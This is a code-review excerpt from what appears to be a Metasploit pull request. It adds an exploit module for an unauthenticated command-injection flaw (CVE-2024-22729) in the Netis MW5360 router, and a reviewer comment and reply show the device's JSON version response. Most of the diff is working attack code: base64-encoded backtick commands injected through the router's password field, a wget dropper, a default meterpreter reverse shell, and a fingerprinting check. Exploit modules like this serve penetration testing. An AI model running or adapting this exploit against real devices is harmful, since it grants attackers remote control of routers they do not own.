modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb

```diff
@@ -0,0 +1,145 @@
+        ],
+        'DisclosureDate' => '2024-01-11',
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_MIPSLE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_MIPSLE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['wget'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 80
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [ true, 'The Netis MW5360 router endpoint URL', '/' ]),
+      OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30])
+    ])
+  end
+
+  def execute_command(cmd, _opts = {})
+    # This is a customised linux dropper that only works with the wget command
+    # - payload need to be split because command chaining using ';' does not work
+    # - each command needs to be executed seperately
+    # - time between execution of each command need to be at least 30 seconds or more to avoid a lock
+    app_random = Rex::Text.rand_text_alphanumeric(4..8)
+    cmd_array = cmd.split(';')
+    cmd_array.each_with_index do |command, i|
+      # use the filedropper logic to remove the payload file
+      register_file_for_cleanup(command) if i == 2
+      # skip the manual remove
+      break if i == 3
+
+      payload = Base64.strict_encode64("`#{command}`")
+      print_status("Executing #{command}")
+      send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),
+        'vars_post' => {
+          'password' => payload,
+          'quick_set' => 'ap',
+          'app' => app_random
+        }
+      })
+      # POST request does not return any output to test
+      # so wait (default 30 sec) before executing the next command to avoid a lock
+      sleep(datastore['CMD_DELAY'])
+    end
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'),
+      'vars_post' => {
+        'mode_name' => 'skk_get',
+        'wl_link' => 0
+      }
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')
+
+    # trying to get the model and version number
+    # unfortunately JSON parsing fails, so we need to use this ugly REGEX :-(
```

Comment:
Please provide an example of the string you're matching against, to facilitate the regex understanding :)

Reply:
`{"version":"Netis(MW5360)-V1.0.1.3442","vender":"RUSSIA","model":"MW5360","time_now":"2024/05/21 15:39:35","sys_date":"2024","sys_date2":"5","sys_date3":"21","sys_time":"15","sys_time2":"39","sys_time3":"35","uptime":"257","cpu":"49%","mem":"7%","statsList":[{"type":"Lan","tx_packets":"52","rx_packets":"69","tx_bytes":"22710","rx_bytes":"6347",},`